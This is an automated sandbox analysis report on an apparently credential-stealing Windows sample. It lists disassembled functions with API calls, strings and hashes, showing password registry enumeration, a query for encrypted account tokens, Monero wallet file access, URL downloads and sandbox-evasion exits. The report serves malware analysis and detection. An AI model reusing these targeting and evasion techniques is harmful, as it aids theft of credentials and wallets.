Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 387b86bb4edc1ca85d2ef84a4cfebf23b85309a2ed7b17c9c1bf4e8e9aa666c2
Instruction ID: 888f3bbde82cf90c689409334424f6bf16d18475f131f8208b6b5135fc54b900
Opcode Fuzzy Hash: 387b86bb4edc1ca85d2ef84a4cfebf23b85309a2ed7b17c9c1bf4e8e9aa666c2
Instruction Fuzzy Hash: E25161B1A00618AFDB20DF51DC49BEE77B8EB44701F108198B609A72C1DFB46E89CF95

Function 009772D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0097733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009773B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0097740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00977452
HeapFree.KERNEL32(00000000), ref: 00977459
task.LIBCPMTD ref: 00977555

Strings

Password, xrefs: 00977401

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 50e028655c5978917834b99000e8f043e6fd928c9a3fdbe9e031e6b622a81186
Instruction ID: 21363417dbb4f927342739e2212fea74d619530153c569ef26db72416654b25e
Opcode Fuzzy Hash: 50e028655c5978917834b99000e8f043e6fd928c9a3fdbe9e031e6b622a81186
Instruction Fuzzy Hash: 4D6109B69442689BDB24DB50CC45BDAB7B8BF84304F00C1E9E64DA6141EFB05BC9CFA1

Function 0097BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 0098A9B0: lstrlen.KERNEL32(?,00849138,?,\Monero\wallet.keys,00990E17), ref: 0098A9C5
Part of subcall function 0098A9B0: lstrcpy.KERNEL32(00000000), ref: 0098AA04
Part of subcall function 0098A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AA12

Part of subcall function 0098A920: lstrcpy.KERNEL32(00000000,?), ref: 0098A972
Part of subcall function 0098A920: lstrcat.KERNEL32(00000000), ref: 0098A982

Part of subcall function 0098A8A0: lstrcpy.KERNEL32(?,00990E17), ref: 0098A905

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

lstrlen.KERNEL32(00000000), ref: 0097BC9F

Part of subcall function 00988E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00988E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0097BCCD
lstrlen.KERNEL32(00000000), ref: 0097BDA5
lstrlen.KERNEL32(00000000), ref: 0097BDB9

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 0097BBEB
AccountId, xrefs: 0097BCC4
AccountTokens, xrefs: 0097BB49
AccountTokens, xrefs: 0097BABA

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: 48d7982f284a2daac0971e59f9bdb87f5f179fc2272755aa876f0cf307facb81
Instruction ID: 80dc9c4530eb6752521b2d36e635610e35c6dfd8f3d3393d4c3c25ae9d58e04f
Opcode Fuzzy Hash: 48d7982f284a2daac0971e59f9bdb87f5f179fc2272755aa876f0cf307facb81
Instruction Fuzzy Hash: 31B112729101089BEF04FBA4DD96FEE7339AF94300F40415AF506A7291EF786A49CB76

Function 00974FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00974FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00974FD1
InternetOpenA.WININET(00990DDF,00000000,00000000,00000000,00000000), ref: 00974FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00975011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00975041
InternetCloseHandle.WININET(?), ref: 009750B9
InternetCloseHandle.WININET(?), ref: 009750C6

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 804e4ca3cef78f26fa4511354db8d7131c60c9271c836c4f434af14cab6d75c9
Instruction ID: da7f9eb6b5bde97b41811759e9995367916fddb4b02d32d146b6d1bcf1365efd
Opcode Fuzzy Hash: 804e4ca3cef78f26fa4511354db8d7131c60c9271c836c4f434af14cab6d75c9
Instruction Fuzzy Hash: FB3103B5E00218ABDB20CF54CC85BDCB7B4EB48704F1081D9EA09A7280DBB46EC58F99

Function 009883DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00988426
wsprintfA.USER32 ref: 00988459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0098847B
RegCloseKey.ADVAPI32(00000000), ref: 0098848C
RegCloseKey.ADVAPI32(00000000), ref: 00988499

Part of subcall function 0098A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0098A7E6

RegQueryValueExA.KERNEL32(00000000,0084E380,00000000,000F003F,?,00000400), ref: 009884EC
lstrlen.KERNEL32(?), ref: 00988501
RegQueryValueExA.KERNEL32(00000000,0084E2F0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00990B34), ref: 00988599
RegCloseKey.KERNEL32(00000000), ref: 00988608
RegCloseKey.ADVAPI32(00000000), ref: 0098861A

Strings

%s\%s, xrefs: 0098844D

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: fc7c025e4703b541158b4f33d6ff07e23e83d4fd3704925ec4317d2dbc38d660
Instruction ID: 0cd5c2372b402d1c48d0bd20c800c87b83a79e3a958a9c40adb62ec22618edec
Opcode Fuzzy Hash: fc7c025e4703b541158b4f33d6ff07e23e83d4fd3704925ec4317d2dbc38d660
Instruction Fuzzy Hash: FF21EBB1910218ABDB24DB54DC95FE9B3B8FB48700F40C5D9E609A7280DF756A85CFE4

Function 00987690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 009876A4
RtlAllocateHeap.NTDLL(00000000), ref: 009876AB
RegOpenKeyExA.KERNEL32(80000002,0083C010,00000000,00020119,00000000), ref: 009876DD
RegQueryValueExA.KERNEL32(00000000,0084E230,00000000,00000000,?,000000FF), ref: 009876FE
RegCloseKey.ADVAPI32(00000000), ref: 00987708

Strings

Windows 11, xrefs: 009876BD

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 73e1872e3e92daa8d858fc1c0add4e466a4a2c55a11df13dab4a189d695ff892
Instruction ID: 5e654dcd64cd515c60808cbe7a67599063f524095d5c6a4e87724b0e989d7588
Opcode Fuzzy Hash: 73e1872e3e92daa8d858fc1c0add4e466a4a2c55a11df13dab4a189d695ff892
Instruction Fuzzy Hash: 63014FB5E04304BBDB00EBE4DC49F6DB7BCEB48701F104554FA05D7290EAB49900CB51

Function 00987720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987734
RtlAllocateHeap.NTDLL(00000000), ref: 0098773B
RegOpenKeyExA.KERNEL32(80000002,0083C010,00000000,00020119,009876B9), ref: 0098775B
RegQueryValueExA.KERNEL32(009876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0098777A
RegCloseKey.ADVAPI32(009876B9), ref: 00987784

Strings

CurrentBuildNumber, xrefs: 00987771

Memory Dump Source

Source File: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true

Associated: 00000000.00000002.1932000779.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.00000000009FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A7F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000A8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932014519.0000000000B3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932376459.0000000000E69000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932724282.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932873655.0000000001004000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1932895785.0000000001005000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_970000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: c37c4f032a93c4a92299da2f2f9fc14dec26eb70d7503f18682cc4a888905378
Instruction ID: 378e4cd3f506575dab023868431edfb5a5b4cf819ba382d2b81b3e0e0ebfd04f
Opcode Fuzzy Hash: c37c4f032a93c4a92299da2f2f9fc14dec26eb70d7503f18682cc4a888905378
Instruction Fuzzy Hash: 6C01F4B5E40308BBDB00DBE4DC49FAEB7B8EB44705F104555FA15A7281DEB559008B51

Function 009869F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,008423B0), ref: 009898A1
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,00842230), ref: 009898BA
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,008424E8), ref: 009898D2
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,00842260), ref: 009898EA
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,008422C0), ref: 00989903
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,00849008), ref: 0098991B
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,00835850), ref: 00989933
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,00835770), ref: 0098994C
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,008422F0), ref: 00989964
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,00842380), ref: 0098997C
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,00842320), ref: 00989995
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,008423C8), ref: 009899AD
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,00835870), ref: 009899C5
Part of subcall function 00989860: GetProcAddress.KERNEL32(74DD0000,00842488), ref: 009899DE

Part of subcall function 0098A740: lstrcpy.KERNEL32(00990E17,00000000), ref: 0098A788

Part of subcall function 009711D0: ExitProcess.KERNEL32 ref: 00971211

Part of subcall function 00971160: GetSystemInfo.KERNEL32(?), ref: 0097116A
Part of subcall function 00971160: ExitProcess.KERNEL32 ref: 0097117E

Part of subcall function 00971110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0097112B
